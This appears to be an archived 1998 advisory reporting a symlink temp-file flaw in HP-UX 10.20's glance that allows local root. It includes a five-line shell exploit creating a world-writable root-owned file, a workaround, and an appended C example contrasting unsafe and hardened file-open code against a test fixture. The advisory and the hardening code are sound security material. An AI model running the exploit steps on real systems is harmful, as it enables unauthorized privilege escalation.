Yet ANOTHER hole in the HP/UX Glance program

Description: Standard symlink-following TMPFILE stupidity
Author: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Compromise: root (local)
Vulnerable Systems: HP/UX 10.20, perhaps other versions.
Date: 27 April 1998

Date: Mon, 27 Apr 1998 23:31:12 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Subject: HP-UX glance bug (#4?)

    * Software:

    HP-UX B.10.20 D
    Glance.Runtime.GLANCE                 B.10.20.95     HP GlancePlus files

    * Bug:

    glance creates a /tmp/status.dce file as root, and it follows
    symlinks, so you can append text like

Pid: 16208  File: ndi_sm.c         Line:   2609   Mon Apr 27 21:52:23 1998
Performance Management Application registered.

    to any system file.

    * Sample exploit:

    $ umask 000
    $ cd /tmp
    $ ln -s /.test status.dce
    $ glance -j 1 -iterations 1 -maxpages 1
    $ ls -l /.test
    -rw-rw-rw-   1 root       bar           1080 Apr 27 23:06 /.test

    # edit /.test to match your needs

    * Workaround:

    I guess creating a non-writable /tmp/status.dce file
    and setting the t bit on /tmp (which it seems it has
    not in the default HPUX installation) would be enough.

    * Note: I've been looking for HP-UX bugs, and I have found
    several reported holes in glance; but it seems this one
    is new...

    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)
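The defect behind the post is a privileged program opening a fixed name in /tmp in a way that follows whatever symlink is already sitting there. The following is an added example, not code from the original post or from HP's glance: it puts that unsafe open pattern next to the hardened form a defender would want in the program itself, and exercises both against a constructed fixture (a scratch directory with a target file and a `status.dce` symlink, standing in for the post's `/tmp/status.dce -> /.test`). The function names, the scratch directory and the fixture files are my own, and the example assumes `O_NOFOLLOW` is available on the build host (it is on Linux and the BSDs).

```c
#define _GNU_SOURCE            /* expose O_NOFOLLOW and mkdtemp on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe pattern (what the post's "follows symlinks" amounts to):
 * fopen(path, "a") creates-or-opens through any symlink sitting at
 * path, so a privileged writer appends wherever the link points. */
int status_append_unsafe(const char *path, const char *msg)
{
    FILE *f = fopen(path, "a");
    if (f == NULL)
        return -1;
    fputs(msg, f);
    fclose(f);
    return 0;
}

/* Hardened writer: O_NOFOLLOW makes open() fail when the last path
 * component is a symlink (ELOOP on Linux, EMLINK on some BSDs), the
 * create mode is private, and the post-open fstat() rejects a planted
 * non-regular file, a file we do not own, or a hard link to something
 * else (st_nlink > 1), which the sticky bit alone does not stop.
 * Returns 0 on success, -1 with errno set otherwise. */
int status_append_safe(const char *path, const char *msg)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    size_t len = strlen(msg);
    ssize_t n = write(fd, msg, len);
    close(fd);
    return (n >= 0 && (size_t)n == len) ? 0 : -1;
}

/* Constructed fixture (hypothetical names): a scratch directory holding
 * an empty target file and a symlink named status.dce pointing at it.
 * Returns 1 when the unsafe writer follows the link, the hardened writer
 * refuses it, and the hardened writer still works once the link is
 * gone; 0 otherwise.  Cleans up after itself. */
int demo_symlink_fixture(void)
{
    char dir[] = "/tmp/glance_demo_XXXXXX";
    char target[64], link[64];
    struct stat st;
    int fd, ok = 0;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/status.dce", dir);

    fd = open(target, O_WRONLY | O_CREAT, 0600);   /* empty victim file */
    if (fd >= 0 && close(fd) == 0 && symlink(target, link) == 0) {
        int followed = status_append_unsafe(link, "written through the link\n") == 0
                       && stat(target, &st) == 0 && st.st_size > 0;
        int refused = status_append_safe(link, "must not land\n") == -1
                      && (errno == ELOOP || errno == EMLINK);
        unlink(link);                               /* now the name is free */
        int fresh_ok = status_append_safe(link, "legitimate status line\n") == 0
                       && lstat(link, &st) == 0 && S_ISREG(st.st_mode);
        ok = followed && refused && fresh_ok;
    }
    unlink(link);
    unlink(target);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("unsafe writer followed the link, hardened writer refused: %s\n",
           demo_symlink_fixture() ? "yes" : "no");
    return 0;
}
```

The sticky bit on /tmp that the post suggests stops other users from removing or renaming entries they do not own, but it does nothing about a symlink or hard link the attacker created before the privileged program ran; the `O_NOFOLLOW` plus `fstat()` check in the hardened writer is the control that belongs in the program regardless of how /tmp is mounted.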

This page is part of Fyodor's exploit world.